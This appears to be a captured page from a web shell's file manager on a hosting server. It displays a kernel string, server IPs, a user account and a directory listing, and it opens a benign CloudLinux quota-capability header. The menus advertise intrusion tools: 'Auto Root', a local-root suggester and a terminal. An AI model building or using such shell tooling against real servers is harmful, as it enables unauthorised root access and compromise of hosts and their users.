Linux sea-business-23.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 104.168.155.189 & Your IP : 216.73.217.84
Domains :
Cant Read [ /etc/named.conf ]
User : zvmcccat
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
include /
lve /
Delete
Unzip
Name
Size
Permission
Date
Action
lvd-map.h
4.21
KB
-rw-r--r--
2026-06-16 09:26
lve-ctl.h
12.54
KB
-rw-r--r--
2026-06-16 09:26
lve-type.h
2.46
KB
-rw-r--r--
2026-06-16 09:26
secureio.h
2.4
KB
-rw-r--r--
2026-06-16 09:26
setcap.h
480
B
-rw-r--r--
2026-06-16 09:26
Save
Rename
/* Library to set needed capabilities for current process */ #ifndef _SETCAP_H_ #define _SETCAP_H_ #include <sys/types.h> // Switch on CAP_SYS_RESOURCE capabality to switch off disk quotas checking // // Returns 0 if successful // Returns -1 if error has occured int enable_quota_capability(); // Switch off CAP_SYS_RESOURCE capabality to switch off disk quotas checking // // Returns 0 if successful // Returns -1 if error has occured int disable_quota_capability(); #endif